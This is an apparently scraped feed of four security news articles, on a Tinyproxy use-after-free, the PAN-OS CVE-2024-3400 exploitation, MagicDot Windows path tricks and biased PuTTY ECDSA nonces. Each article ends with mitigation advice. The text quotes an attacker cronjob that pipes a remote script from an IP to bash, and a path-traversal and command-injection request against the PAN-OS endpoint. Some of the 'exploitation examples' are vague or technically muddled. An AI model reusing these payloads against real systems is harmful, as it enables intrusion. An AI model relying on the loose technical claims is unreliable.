Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ Information Security Newspaper|Infosec Articles|Hacking News Mon, 06 May 2024 20:42:25 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.4 https://www.securitynewspaper.com/snews-up/2018/12/news5.png Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ 32 32 How Safe is Your TinyProxy? Step-by-Step Guide to Exploiting Tinyproxy’s Zero Day Vulnerability https://www.securitynewspaper.com/2024/05/06/how-safe-is-your-tinyproxy-step-by-step-guide-to-exploiting-tinyproxys-zero-day-vulnerability/ Mon, 06 May 2024 20:40:29 +0000 https://www.securitynewspaper.com/?p=27455 A significant security flaw, identified as CVE-2023-49606, has been reported by Cisco Talos in the widely used Tinyproxy software. This vulnerability, stemming from improper handling of HTTP Connection headers, exposesRead More →

The post How Safe is Your TinyProxy? Step-by-Step Guide to Exploiting Tinyproxy’s Zero Day Vulnerability appeared first on Information Security Newspaper | Hacking News.

]]>
A significant security flaw, identified as CVE-2023-49606, has been reported by Cisco Talos in the widely used Tinyproxy software. This vulnerability, stemming from improper handling of HTTP Connection headers, exposes systems to potential remote code execution, which could allow attackers to take control of affected servers.

Overview of the Vulnerability

Tinyproxy, a minimalist, open-source HTTP proxy, is designed for simplicity and efficiency, making it popular in environments where lightweight proxies are required. The vulnerability in question arises in the parsing of HTTP Connection headers—a fundamental component meant to specify which headers are persistent during an HTTP session.

According to the Cisco Talos vulnerability report (TALOS-2023-1889), specific versions of Tinyproxy, namely 1.11.1 and 1.10.0, are affected. The flaw exists in the remove_connection_headers function of Tinyproxy, where a use-after-free error can occur. This kind of software bug is particularly dangerous as it can lead to memory corruption, providing an attacker with a pathway for executing arbitrary code on the host machine.

Technical Breakdown

The issue arises when Tinyproxy handles HTTP headers that are supposed to be removed according to the Connection header’s directives. If the Connection or Proxy-Connection headers are manipulated by an attacker, it can lead to the reuse of previously freed memory. This use-after-free scenario is triggered as follows:

  • Tinyproxy iterates over the headers specified in the Connection or Proxy-Connection header.
  • Each specified header is removed from a key-value store (hashofheaders), and its memory is subsequently freed.
  • However, due to an error in the management of these headers, the freed memory can be reused before the function completes, leading to memory corruption.

This vulnerability is particularly concerning because it can be exploited with a simple malformed HTTP request, making it easy for an attacker to leverage and potentially take over the system running Tinyproxy.

Exploitability and Impact

The CVSSv3 score for this vulnerability is 9.8 (Critical), which underscores its severity. An attacker does not need authenticated access to the target system, making it accessible to any malicious entity that can send HTTP requests to the affected proxy. The potential impacts include unauthorized access, data breaches, service disruption, and in severe cases, complete system compromise.

A use-after-free issue occurs when an application continues to use a memory reference (pointer) after it has freed the memory to which the pointer refers. This can lead to unpredictable behavior, including application crashes, data corruption, and the execution of arbitrary code.

Exploitation Example for CVE-2023-49606

Scenario Setup: Imagine a scenario where a server is running Tinyproxy version 1.11.1. This version is known to have a use-after-free vulnerability in the way it processes HTTP Connection headers.

Step-by-Step Exploitation:

  1. Initial HTTP Request by Attacker:
    • The attacker crafts an HTTP request that includes specially designed Connection headers. The goal is to manipulate these headers to trigger the use-after-free condition.
    • Example HTTP request:
      • GET / HTTP/1.1
      • Host: vulnerable-proxy.com
      • Connection: keep-alive, maliciousHeader
      • maliciousHeader: freeThis
  2. Processing the Request:
    • Tinyproxy receives the request and parses the headers. According to the specifications, it must remove headers listed in the Connection header after processing the request.
    • The remove_connection_headers function is called to handle this task.
  3. Triggering the Use-After-Free:
    • During the processing, Tinyproxy removes maliciousHeader and frees the memory associated with it. However, due to a flaw in the proxy’s memory management, this freed memory could be reallocated for new data while still being referenced by the ongoing process.
    • Suppose the freed memory is quickly reallocated and filled with attacker-controlled data through another part of the application (or another request processed concurrently).
  4. Exploiting the Freed Memory:
    • The attacker anticipates that Tinyproxy will access this freed (and now reallocated) memory again before the function completes. If this memory now contains executable code or data crafted by the attacker, it might be executed or wrongly used by the application.
    • For instance, if the memory location is used to store a function pointer, the attacker could overwrite this pointer with the address of their malicious code.
  5. Executing Arbitrary Code:
    • When Tinyproxy tries to access the “freed” memory as part of its usual operations (e.g., to log details or continue processing headers), it inadvertently executes the code pointed to by the overwritten pointer.
    • This could allow the attacker to execute arbitrary code on the server running Tinyproxy, potentially giving them full control over the server.

Example of Malicious Impact:

  • The attacker could install backdoors, exfiltrate confidential data, launch further attacks from the compromised server, or disrupt the server’s operations.

Mitigation and Response

As of the last update from Cisco Talos, there has been no official patch or maintenance release from the maintainers of Tinyproxy to correct this vulnerability. Organizations using Tinyproxy are advised to monitor their systems closely for unusual activity and implement additional safeguards until a patch is available. This may include:

  • Deploying web application firewalls (WAFs) to filter out malicious HTTP headers.
  • Isolating the proxy server from critical internal networks.
  • Regularly updating all software to the latest versions where possible.

For users and administrators of Tinyproxy, understanding the technical mechanics of this vulnerability and staying vigilant about monitoring their network traffic is crucial. Immediate action is recommended to mitigate the risks associated with this critical vulnerability until a permanent fix is issued.

The post How Safe is Your TinyProxy? Step-by-Step Guide to Exploiting Tinyproxy’s Zero Day Vulnerability appeared first on Information Security Newspaper | Hacking News.

]]>
Eternal Malware: CVE-2024-3400 Rootkits Persist Through Palo Alto Firewalls Updates and Resets https://www.securitynewspaper.com/2024/04/30/eternal-malware-cve-2024-3400-rootkits-persist-through-palo-alto-firewalls-updates-and-resets/ Tue, 30 Apr 2024 16:37:51 +0000 https://www.securitynewspaper.com/?p=27450 The cybersecurity community has recently been abuzz with discussions surrounding CVE-2024-3400, a critical vulnerability affecting Palo Alto Networks’ PAN-OS, used in their popular firewall products. This vulnerability has seen aRead More →

The post Eternal Malware: CVE-2024-3400 Rootkits Persist Through Palo Alto Firewalls Updates and Resets appeared first on Information Security Newspaper | Hacking News.

]]>
The cybersecurity community has recently been abuzz with discussions surrounding CVE-2024-3400, a critical vulnerability affecting Palo Alto Networks’ PAN-OS, used in their popular firewall products. This vulnerability has seen a surge in exploitation activities following the release of a proof-of-concept (PoC) code, prompting urgent responses from both cybersecurity experts and Palo Alto Networks.

Overview of CVE-2024-3400

CVE-2024-3400 is categorized as an unauthenticated remote code execution vulnerability that could allow attackers to execute arbitrary code on the affected device without needing prior authentication. The flaw is particularly concerning because it can be exploited remotely, potentially giving attackers deep access to network defenses.

The CVE-2024-3400 vulnerability in Palo Alto Networks’ PAN-OS, targeted by Operation MidnightEclipse, has recently been leveraged for more sophisticated exploits, including the deployment of the UPSTYLE backdoor and the creation of malicious cronjobs. This detailed examination highlights the current scope of the attack, with insights derived from ongoing cybersecurity investigations.

Current Scope of the Attack

The exploitation of CVE-2024-3400 has evolved into a multi-faceted attack vector, primarily utilized by sophisticated threat actors. These actors employ a combination of direct command execution and advanced persistence mechanisms to maintain access and control over compromised systems. The UPSTYLE backdoor and associated cronjob activities represent two of the most critical components of this attack:

  1. UPSTYLE Backdoor Deployment: In observed attacks, malicious actors have used crafted HTTP requests to exploit the vulnerability, subsequently running shell commands to download and execute the UPSTYLE backdoor script from remote servers. This script is often hosted on compromised web servers, with addresses like 144.172.79[.]92/update.py being involved in the distribution.
  2. Cronjob Creation for Persistent Access: Furthering their control, attackers have also been observed creating cronjobs on compromised systems. These cronjobs are designed to automatically execute commands at regular intervals, fetching instructions from URLs like hxxp://172.233.228[.]93/policy | bash. This method ensures that even if the initial backdoor is detected and removed, the attackers retain a method of re-entry.

Technical Insights into UPSTYLE and Cronjob Activities

The technical execution of these components involves several sophisticated techniques:

  • Command Execution: The initial exploit allows attackers to execute arbitrary shell commands remotely. This capability is used to install the UPSTYLE backdoor, modify system configurations, and set up new network routes to exfiltrate data securely.
  • File Manipulation: Post-exploitation activities include modifying system files to hide the presence of malicious software. This often involves altering logs and other digital footprints that could be used to detect the intrusion.
  • Automated Persistence: The cronjobs are set to run every minute, a tactic that provides the attackers with near-constant system access and the ability to push updates or new commands to the compromised system swiftly.

Active Exploitation and PoC Release

Reports from various cybersecurity firms, including Kroll and Zscaler, have highlighted active and opportunistic exploitation of this vulnerability by numerous threat actors. The ease of the exploit, compounded by the release of a PoC, has made CVE-2024-3400 a preferred target for malicious activities aimed at infiltrating and compromising enterprise networks.

Exploit details shared on platforms like GitHub reveal how attackers can utilize path traversal techniques combined with crafted HTTP requests to manipulate the firewall’s operating system, leading to unauthorized remote code execution. The ability of these attacks to bypass traditional security layers underscores the severity of the vulnerability.

Exploitation Mechanism: The exploitation of CVE-2024-3400 involves a series of sophisticated steps that allow attackers to bypass authentication and execute arbitrary code. Here are the key technical elements involved:

  • Path Traversal: The initial vector for the attack utilizes a path traversal flaw in the web management interface. Attackers craft malicious HTTP requests that manipulate the file system to access areas that are normally restricted. This is typically achieved through inputs that include “../” sequences or similar methods to navigate the file system.
  • Command Injection: After gaining access to restricted areas, attackers exploit command injection vulnerabilities. By inserting malicious commands into scripts or command lines that the system erroneously executes, attackers can initiate unauthorized actions on the device.
  • Remote Code Execution (RCE): The culmination of the exploit allows attackers to run arbitrary code with the same privileges as the operating system of the firewall. This can lead to full system control, data manipulation, and initiation of further attacks from the compromised device.

Proof-of-Concept (PoC) Exploitation

The proof-of-concept that circulated in cybersecurity circles demonstrated a practical application of the aforementioned exploit techniques. The PoC is typically a script or set of instructions that exploit the vulnerability to prove its existence and potential for damage. In the case of CVE-2024-3400, the PoC details are as follows:

  • Exploit Script: Publicly available scripts show how attackers can automatically perform the exploit using simple HTTP requests. These scripts are often shared on coding platforms like GitHub or cybersecurity forums.
  • HTTP Request Manipulation: The PoC often includes examples of HTTP requests that induce the vulnerability. For example, an HTTP request might include a path traversal combined with a command injection like:vbnetCopy codePOST /ssl-vpn/hipreport.esp HTTP/1.1 Host: vulnerable-host Cookie: SESSID=../../../../../../var/cmd; command-to-execute
  • Malicious Payloads: These payloads are crafted to perform specific actions on the compromised device, such as opening a reverse shell, modifying firewall rules, or exfiltrating confidential data.

Response from Palo Alto Networks

In response to the escalating threat, Palo Alto Networks has issued several security updates and detailed guidance for mitigation. The company has acknowledged the PoC and its implications, urging all users of the affected PAN-OS versions to update their systems immediately to the latest firmware.

Persistent Threats Despite Remediation

  1. Persistent Rootkits: The researcher indicates that they have developed a payload that can survive not only operational resets but also factory resets. This type of malware, often referred to as a rootkit, embeds itself deeply within the system such that standard cleanup processes do not erase it. Rootkits can intercept and alter standard operating system processes to hide their presence, making detection and removal particularly challenging.
  2. Post-Exploitation Persistence: There is mention of post-exploit persistence techniques that remain effective even after the device has been reset or firmware upgrades have been applied. This means that merely resetting the device to factory settings or updating its firmware isn’t sufficient to ensure that it is free from compromise. The persistence techniques developed can withstand these typical remedial actions.
  3. Low Barrier to Entry: The researcher points out that creating such a persistent rootkit does not require advanced skills, suggesting that even less sophisticated attackers could deploy similar threats. This lowers the barrier to entry for executing highly effective and persistent attacks on vulnerable systems.
  4. Physical Hardware Replacement Needed: Due to the rootkit’s resilience and deep integration into the system, the researcher recommends a full physical swap of the affected hardware or a thorough offline inspection and validation of the firmware and BIOS by a specialist. This is suggested as the only sure way to remove such entrenched malware, highlighting the severity and depth of the potential security breach.

Updated PSIRT Guidance

  • Persistence Acknowledgement: The Palo Alto Networks Product Security Incident Response Team (PSIRT) has updated their guidance to acknowledge that malware can persist through updates and factory resets. This is an important admission that helps users understand the potential for ongoing risks even after applying what are typically considered comprehensive mitigation steps.
  • Safety After Patching: While early patching is critical, the updated guidance suggests that simply having patched early does not guarantee safety against sophisticated attackers who may have enabled persistence mechanisms. Users who patched their systems immediately after the vulnerability was disclosed may still need to consider additional measures to ensure their systems are secure.

Recommendations

Given the nature of this persistent threat, organizations and individuals using affected Palo Alto Networks products should consider the following actions:

  1. Physical Replacement: Where feasible, replace potentially compromised hardware to eliminate any chance of lingering threats.
  2. Specialist Review: Engage with cybersecurity specialists to conduct thorough offline checks of the firmware and BIOS to ensure no elements of the rootkit or other malware remain.
  3. Enhanced Monitoring: Implement enhanced monitoring and logging to detect any signs of rootkit activity or other unusual behaviors that indicate a compromised system.
  4. Comprehensive Security Practices: Continue applying security best practices, including regular updates, strict access controls, and frequent security audits to identify and mitigate threats.

The exploitation of CVE-2024-3400 has significant implications for network security, particularly for enterprises that rely on Palo Alto firewalls to protect their critical infrastructure. The vulnerability exposes these networks to potential espionage, data breaches, and other malicious activities if not addressed promptly.

Security experts recommend implementing a multi-layered defense strategy that includes regular updates, monitoring for unusual network activity, and employing advanced threat detection solutions. Additionally, companies are advised to review and strengthen their incident response plans to quickly react to any breaches that might occur.

The discovery and subsequent exploitation of CVE-2024-3400 highlight ongoing challenges in cybersecurity defense mechanisms, particularly in widely used infrastructure components like firewalls. It also stresses the importance of timely patches and the dangers posed by publicly available exploit codes. As the digital landscape evolves, so too does the necessity for robust, proactive security measures to safeguard critical data and systems from emerging cyber threats.

The post Eternal Malware: CVE-2024-3400 Rootkits Persist Through Palo Alto Firewalls Updates and Resets appeared first on Information Security Newspaper | Hacking News.

]]>
Hacking with MagicDots: Exploiting Dots & Spaces in Filenames/Pathnames for Permanent Admin Rights https://www.securitynewspaper.com/2024/04/22/hacking-with-magicdots-exploiting-dots-spaces-in-filenames-pathnames-for-permanent-admin-rights/ Mon, 22 Apr 2024 23:47:58 +0000 https://www.securitynewspaper.com/?p=27445 In a recent study conducted by SafeBreach Labs, a security research team has uncovered a trio of vulnerabilities stemming from a longstanding issue within the DOS-to-NT path conversion process usedRead More →

The post Hacking with MagicDots: Exploiting Dots & Spaces in Filenames/Pathnames for Permanent Admin Rights appeared first on Information Security Newspaper | Hacking News.

]]>
In a recent study conducted by SafeBreach Labs, a security research team has uncovered a trio of vulnerabilities stemming from a longstanding issue within the DOS-to-NT path conversion process used by Windows operating systems. This study, led by Or Yair, Security Research Team Lead, has revealed not only vulnerabilities but also various rootkit-like techniques that were exploitable without administrative privileges.

Or Yair and his team found that the MagicDot paths—an area seemingly harmless and known but overlooked—posed significant security risks. The vulnerabilities included allowing malicious actors to hide files and processes, manipulate file restoration processes, and make malware appear as verified software on task managers and process explorers. The most concerning part was that these actions could be executed without the need for administrative rights, essentially offering rootkit capabilities to any unprivileged user.

The DOS-to-NT path conversion process in Windows is a fundamental aspect of how the operating system handles file paths. This process can be complex due to the legacy support for DOS-style paths and the current NT (New Technology) file system paths used by modern Windows. Understanding this conversion process is crucial for grasping how vulnerabilities might arise.

DOS Paths

DOS paths are traditionally shorter and have limitations compared to NT paths:

  • Length: DOS paths typically support a maximum of 260 characters.
  • Format: They use a simple structure, generally starting with a drive letter followed by a colon and a backslash, then the directory names, separated by backslashes (e.g., C:\Program Files\Example).
  • Character Set: DOS paths are limited to upper-case letters with no spaces or special characters beyond underscores.

NT Paths

NT paths are used in modern Windows operating systems and support more complex features:

  • Length: They can exceed the classic 260-character limit of DOS paths.
  • Format: NT paths can include networking setups and subsystem links. They often start with \\?\ for local paths or \\?\UNC\ for network paths to bypass the character limit (e.g., \\?\C:\Program Files\Example).
  • Character Set: NT paths allow for a wider range of characters in file and directory names, including spaces and mixed case.

Conversion Process

The conversion from a DOS path to an NT path involves several steps that accommodate these differences. Here’s a simple example to illustrate:

Example of Conversion

DOS Path: C:\PROGRA~1\Example

  • This is a shortened DOS path where PROGRA~1 might be the shortened version of Program Files.

Converted NT Path: \\?\C:\Program Files\Example

  • The DOS path is expanded to its full NT format, including the special prefix \\?\ that tells Windows to handle this as an extended-length path.

Vulnerabilities

The conversion process is prone to vulnerabilities, especially if malicious actors manipulate path names by inserting special characters or irregular spacing. For example:

  • Manipulated DOS Path: C:\PROGRA~1\Example\.. \.. \badfile.exe
  • In this manipulated path, the use of dots (..) and irregular spacing can trick the system into navigating up the directory tree unexpectedly, potentially accessing or executing a file (badfile.exe) from an unintended location.

The vulnerabilities uncovered by the “MagicDot” research, particularly focusing on the Windows DOS-to-NT path conversion, highlight significant security risks including Remote Code Execution (RCE) and Elevation of Privilege (EoP). These vulnerabilities stem from the system’s mishandling of file paths, where the inclusion of special characters like trailing dots and spaces can lead to unexpected and potentially harmful behavior. Here’s a breakdown of how these specific vulnerabilities manifest:

Remote Code Execution (RCE)

Overview: Remote Code Execution occurs when an attacker is able to execute arbitrary code on another machine over a network, typically bypassing security mechanisms to gain control of the targeted system.

MagicDot Exploitation Path:

  • File Name Manipulation: An attacker can craft file names with trailing dots and spaces that are misinterpreted by some parts of the Windows OS but are treated as valid executable paths by others.
  • Misleading Application and Services: For example, a script or application might download a file named safe_script.ps1. intending to run a PowerShell script. The system, however, executes a malicious script named safe_script.ps1 (without the dot) that the attacker previously placed on the system.
  • Triggering Execution: This can happen through web downloads, email attachments, or other means where the user or an automated system executes what appears to be a benign file, leading to the execution of malicious code.

Elevation of Privilege (EoP)

Overview: Elevation of Privilege occurs when an attacker gains higher access rights than intended, typically moving from a lower privilege level to a higher one, such as obtaining administrative rights from a normal user account.

MagicDot Exploitation Path:

  • Directory and File Confusion: By creating directories or files with trailing spaces or dots, an attacker might confuse system processes about the identity and attributes of a file or directory. For instance, manipulating file paths could trick the system into executing a file from an unprivileged context as if it has administrative privileges.
  • Bypassing Security Controls: These path manipulations can allow malware to be placed in sensitive directories or execute operations that normally require higher privileges. For example, an executable might be placed in a system directory disguised with a trailing dot, misleading system defenses that check the integrity of filenames without considering such anomalies.
  • Exploiting System Processes: If a system process automatically processes files from a directory (like a temp directory) and executes files supposed to be logs or non-executable data, the misinterpreted paths can lead to unauthorized administrative actions being performed.

The most critical of these vulnerabilities was logged under CVE-2023-42757, which, as confirmed by MITRE and Microsoft, pertains to an exploitable flaw that will be documented in a forthcoming CVE entry.

The Exploit Technique

The MagicDot exploit takes advantage of the way Windows trims trailing dots and spaces from file names during its DOS-to-NT path conversion. By carefully crafting file names that include these characters, attackers can create files that appear benign to certain processes while being malicious in nature. Here’s a detailed step-by-step example of how such an exploit might be executed:

Example of MagicDot Exploit

  1. Creating the Malicious File:
    • An attacker creates a file named important.txt... on a system. While the file name is displayed as important.txt in most legacy interfaces (due to DOS conventions trimming the trailing dots), the NT file system retains the full name including the dots.
  2. Exploitation:
    • The attacker convinces a system process or an application to interact with important.txt, intending to access the benign-looking file.
    • Due to the path conversion process, some applications that do not trim trailing spaces or dots may end up interacting with important.txt..., which is actually a different, malicious file controlled by the attacker.
  3. Bypassing Security Measures:
    • By using this naming discrepancy, the malicious file can bypass security measures that might not recognize it as a threat due to its seemingly innocuous name (as seen by most legacy applications).
  4. Impact:
    • This kind of path manipulation could allow the attacker to execute arbitrary code, replace system files, intercept data, or cause other unauthorized actions, all while avoiding detection by security tools that only scan for known dangerous paths or file names.

Rootkits are malicious software designed to gain unauthorized access to a computer system while remaining hidden from users and security programs. They often provide the attacker with administrator-level access, allowing them to alter system configurations, hide malicious activity, and maintain persistent access. Rootkit capabilities vary, but they typically include functionalities that manipulate core system processes and structures to conceal their presence.

Technical Details on Rootkit Capabilities

Rootkits interact deeply with the operating system, often at the kernel level, to avoid detection. They can intercept and alter system calls, hide specific files and directory entries, and mask network connections and processes. Here’s how rootkit capabilities can be understood through a conceptual example:

Example: File and Process Concealment Rootkit

  1. Kernel-Level Manipulation:
    • The rootkit injects itself into the kernel or operates as a kernel module, giving it high-level control over system functions.
  2. File Concealment:
    • Objective: Make certain files invisible to system tools and users.
    • Method: The rootkit intercepts system calls that list directory contents (e.g., readdir on Linux or NtQueryDirectoryFile on Windows). It modifies the results to exclude specific files or directories from being displayed.
  3. Process Concealment:
    • Objective: Hide certain processes to avoid detection by task managers or monitoring software.
    • Method: Similar to file concealment, the rootkit intercepts system calls related to process enumeration (e.g., NtQuerySystemInformation on Windows). It then filters out any information related to its own processes or other specified malicious processes.
  4. Example Scenario:
    • An attacker installs a rootkit on a system that hides a malicious process named badprocess.exe. The rootkit is programmed to intercept calls to NtQuerySystemInformation, used by Windows Task Manager to list running processes.
    • When Task Manager runs, it queries the system for a list of all processes. However, each time this query includes badprocess.exe, the rootkit removes this entry from the results.
    • As a result, badprocess.exe operates on the system without appearing in the task list, effectively invisible to both users and most antivirus software.

Unprivileged Rootkit-like Capabilities Through MagicDot Paths

Rootkits traditionally require privileged access to a system to manipulate core processes and remain undetected. However, the MagicDot findings illustrate that attackers can achieve similar outcomes—such as concealing malicious activities and manipulating system processes—without needing such elevated privileges. This is done through clever manipulation of file path anomalies allowed by the system.

Key Capabilities Demonstrated:

  1. File and Directory Masking:
    • By appending dots (.) and spaces to filenames, attackers can create files or directories that are not properly recognized or are misinterpreted by certain parts of the operating system. This allows malicious files to be hidden in plain sight, effectively invisible to standard file management tools and even some antivirus software.
  2. Misleading System and Applications:
    • The anomalies in handling trailing dots and spaces can mislead applications and system processes about the true nature or existence of files. For example, a file named example.txt... might be shown and treated as example.txt in some interfaces, while it is a separate and potentially harmful file in reality.
  3. Bypassing Security Mechanisms:
    • These path manipulations can be used to bypass security mechanisms that rely on file path integrity checks. By exploiting the discrepancies between how file paths are displayed and stored, attackers can smuggle in or execute malicious payloads unnoticed.
  4. Persistent Access and Control:
    • Similar to traditional rootkits, files created using MagicDot techniques can persist on the system and perform unauthorized activities without being detected. These files can continually interfere with system operations or monitor user actions covertly.

Example Scenario:

Suppose an attacker wants to execute a malicious script without detection. They might create a file named update.bat... on a system. Here’s how they could leverage the MagicDot vulnerability:

  • Creation: The attacker uploads update.bat... via a compromised email attachment or through a web download.
  • Execution Ambiguity: The file might be displayed as update.bat in some administrative tools, leading system administrators to believe it’s a legitimate batch file for updates.
  • System Manipulation: When executed (either by an auto-run setup or manual execution), the system runs the malicious update.bat..., believing it to be benign, allowing the attacker to execute a payload that could steal data, install further malware, or create backdoors.

Implications for Software Vendors

Upon discovering such vulnerabilities, researchers typically engage in a responsible disclosure process with the vendor, in this case likely Microsoft. This includes privately informing Microsoft of the vulnerabilities, allowing them time to verify and develop a fix before any public disclosure. Microsoft would then acknowledge the issue, investigate, and replicate the findings, followed by developing and releasing a patch. They would also issue a detailed advisory that includes mitigation guidance and a CVE number for tracking. The findings from SafeBreach Labs underscore a crucial reminder for software developers—known issues, even if longstanding and seemingly minor, can pose serious security risks if left unaddressed. This case study emphasizes the need for thorough assessments and updates to existing software infrastructures to prevent potential exploits.

The study not only exposes specific vulnerabilities but also proposes actionable insights for software vendors on maintaining and enhancing security protocols. As vulnerabilities like these are widespread and not limited to a single software product, the implications are broad and warrant a systemic review by all software vendors to safeguard against similar exploits.

The post Hacking with MagicDots: Exploiting Dots & Spaces in Filenames/Pathnames for Permanent Admin Rights appeared first on Information Security Newspaper | Hacking News.

]]>
Compromising Cryptographic Key Security Through PuTTY: A Deep Dive into CVE-2024-31497 https://www.securitynewspaper.com/2024/04/16/compromising-cryptographic-key-security-through-putty-a-deep-dive-into-cve-2024-31497/ Wed, 17 Apr 2024 00:00:18 +0000 https://www.securitynewspaper.com/?p=27441 CVE-2024-31497 has emerged as a critical security flaw affecting PuTTY, a widely used SSH and Telnet client, from versions 0.68 through 0.80, all of which are now confirmed to haveRead More →

The post Compromising Cryptographic Key Security Through PuTTY: A Deep Dive into CVE-2024-31497 appeared first on Information Security Newspaper | Hacking News.

]]>
CVE-2024-31497 has emerged as a critical security flaw affecting PuTTY, a widely used SSH and Telnet client, from versions 0.68 through 0.80, all of which are now confirmed to have a serious vulnerability that compromises cryptographic key security. This vulnerability revolves around the generation of biased ECDSA nonces, which could potentially allow an attacker to recover the NIST P-521 secret keys used by clients.

The Vulnerability Explained

The core of the issue lies in how ECDSA (Elliptic Curve Digital Signature Algorithm) nonces are generated within these versions of PuTTY. The nonces, which should be random to ensure the security of the cryptographic process, were found to be “heavily biased”. This bias in the nonce generation process means that it does not provide the cryptographic randomness required, thereby exposing the private keys to potential recovery by malicious entities.

The specific target of this vulnerability is the NIST P-521 elliptic curve, a standard that is commonly used for securing sensitive communications. The flaw was detailed in various security advisories and databases, which highlighted the risk of attackers being able to exploit this vulnerability to gain unauthorized access to encrypted communications.

Exploiting CVE-2024-31497: A Deep Dive into the PuTTY Vulnerability

CVE-2024-31497 has identified a critical security flaw within versions 0.68 through 0.80 of PuTTY, a popular SSH and Telnet client, specifically targeting its ECDSA nonce generation process. This vulnerability exposes the potential for attackers to recover the NIST P-521 secret keys, posing severe risks to encrypted communications.

The Mechanism of the Exploit

The vulnerability arises from the way PuTTY generates ECDSA nonces. In cryptographic protocols, nonces (numbers used once) are crucial for ensuring the security of the encryption process. Ideally, these should be unpredictable and randomly generated. However, in the affected versions of PuTTY, the ECDSA nonces were found to be “heavily biased”, meaning they do not offer the randomness necessary to securely encrypt data.

This bias in nonce generation makes it theoretically possible for an attacker with sufficient resources and access to encrypted communications to use statistical methods to infer the private key associated with a particular set of communications. Specifically, the bias could allow attackers to perform a side-channel attack where they could deduce the private keys after observing a large number of cryptographic operations.

To exploit this vulnerability, an attacker would need to intercept the cryptographic operations performed by a victim using the compromised versions of PuTTY. The attacker could then apply advanced cryptanalytic techniques to exploit the biased nonce values. This would involve complex mathematical calculations and possibly significant computational resources to effectively “guess” the private key through patterns observed in the biased nonces.

Example of Exploiting CVE-2024-31497: Simulated Attack Scenario

To illustrate how CVE-2024-31497 could be exploited, let’s consider a hypothetical attack scenario:

Scenario Background:

Alice is an administrator who uses PuTTY version 0.70 to manage remote servers for her organization. She connects to these servers using an SSH key pair, where the private key is secured on her local machine.

Step 1: Gathering Information

An attacker, Bob, learns that Alice’s organization still uses a vulnerable version of PuTTY. He decides to target her to gain unauthorized access to the secure servers. Bob begins by intercepting Alice’s SSH sessions to the server. This is typically done using a network sniffer on a compromised network or through a man-in-the-middle attack.

Step 2: Intercepting Cryptographic Operations

During each of Alice’s SSH sessions, Bob captures the encrypted data packets, focusing on extracting the ECDSA nonce values used in the cryptographic operations. Since these nonces are biased (due to the CVE-2024-31497 vulnerability), they do not vary as randomly as they should.

Step 3: Exploiting the Bias

Bob uses a custom-developed script to analyze the captured nonces. The script employs statistical algorithms to detect patterns and irregularities in the nonces that should be random. These patterns indicate the biased nature of the nonce generation in PuTTY, making the private key more predictable.

Step 4: Cracking the Private Key

Using the patterns observed, Bob applies a series of advanced mathematical calculations designed to reverse-engineer Alice’s private key. This type of cryptanalysis exploits the weaknesses inherent in the biased nonces, gradually narrowing down the possible values of the private key.

Step 5: Gaining Unauthorized Access

Once Bob successfully deduces Alice’s private key, he uses it to authenticate himself on the SSH server as if he were Alice. He can now execute commands, access confidential information, and potentially implant further malware to maintain access or affect other parts of the network.

Digital Signature Exploit Mechanism in SSH and Git

  1. Digital Signature Creation and Verification:
    • Digital Signature Creation: A digital signature is created using a user’s private key. This process involves the private key signing data (in this case, a Git commit), which effectively “seals” the data with proof that it was signed by the holder of the private key.
    • Digital Signature Verification: The corresponding public key, which is known to others, can be used to verify that the signature was made by the matching private key without exposing the private key itself. This process confirms the identity of the user and ensures the integrity and authenticity of the signed data.

Exploitation Explained

  1. Collecting Signatures for Exploitation:
    • Via SSH Server Logs: If an attacker controls or compromises an SSH server, they can collect the digital signatures generated during user logins. These signatures, when created using compromised or weak cryptographic methods, can be analyzed to reveal patterns or weaknesses.
    • Via Signed Git Commits: A more practical approach, as mentioned, involves collecting signatures from signed Git commits. If Git is configured to use SSH keys for signing commits and these commits are pushed to a public repository (like GitHub), the signatures are easily accessible to anyone.
  2. Exploiting Vulnerabilities in Signature Generation:
    • In the context of PuTTY and Pageant, if there is a vulnerability in how these tools generate signatures (such as using biased nonces as in CVE-2024-31497), an attacker can potentially exploit this to deduce the private key used for signing.
    • Calculation of Private Key: According to the provided information, attackers might need around 58 signatures to calculate a target’s private key accurately. This calculation is likely based on the ability to exploit flaws in the nonce generation process during signature creation.

Specific Use Case: PuTTY and Pageant with Git

  1. PuTTY and Pageant Setup for Git:
    • Configuration: Users might configure Git to use Pageant as an SSH agent, where Pageant manages their SSH keys. When making Git commits, these commits are signed using the SSH key provided by Pageant.
    • Vulnerability Risk: If Pageant is using a version of PuTTY affected by CVE-2024-31497, then the signatures it generates for Git commits might be vulnerable to being exploited, allowing attackers to eventually recover the private key.

Implications of the Exploit

The recovery of NIST P-521 secret keys via this exploit could allow unauthorized parties to decrypt sensitive information, impersonate legitimate users, or perform a range of other malicious activities. Given PuTTY’s extensive use in managing secure communications for critical infrastructure, this vulnerability could have widespread implications, potentially affecting a wide array of sectors including government, finance, and healthcare.

Security Responses and Fixes

CVE-2024-31497 specifically affects PuTTY software versions 0.68 through 0.80. The vulnerability is tied to the implementation of the ECDSA nonce generation within these specific versions of PuTTY. As such, other software products are not directly impacted by this CVE unless they somehow incorporate the same flawed code or similar nonce generation mechanisms that were used in PuTTY.

However, here’s a broader perspective on other software types that could potentially be impacted by similar vulnerabilities:

  1. SSH Clients:
    • Other SSH clients might also suffer from similar vulnerabilities if they use flawed or biased ECDSA nonce generation methods. Users should ensure they use up-to-date versions and apply patches regularly.
  2. Cryptographic Libraries:
    • Libraries that implement ECDSA and other cryptographic algorithms could be vulnerable if they have similar issues with nonce generation. Examples include OpenSSL, Libgcrypt, and others which have previously had vulnerabilities related to cryptographic nonce handling.
  3. VPN Software:
    • VPNs that use custom or outdated cryptographic implementations may be vulnerable to similar issues if they do not use secure, random nonce generation methods in their cryptographic protocols.
  4. Secure Communication Applications:
    • Applications that facilitate secure messaging and data transmission, relying on ECDSA for encryption, could potentially be exposed if their nonce generation is biased or predictable.
  5. Financial Transaction Systems:
    • Systems that handle e-commerce and financial transactions using ECDSA for transaction signing could be at risk if they inherit or fail to properly implement secure nonce generation practices.

Best Practices for Prevention:

  • Regular Updates and Patching: Regularly updating all software to the latest version is critical. This not only applies to PuTTY but to all software that involves cryptographic operations.
  • Security Audits: Regularly conduct security audits of the cryptographic practices and implementations used within your organization’s software stack.
  • Vulnerability Scanning: Use vulnerability scanners and penetration testing tools to identify and mitigate risks associated with cryptographic implementations.

By keeping an eye on updates related to cryptographic practices and implementing robust security measures, organizations can safeguard against vulnerabilities similar to CVE-2024-31497 and protect their data integrity and privacy.

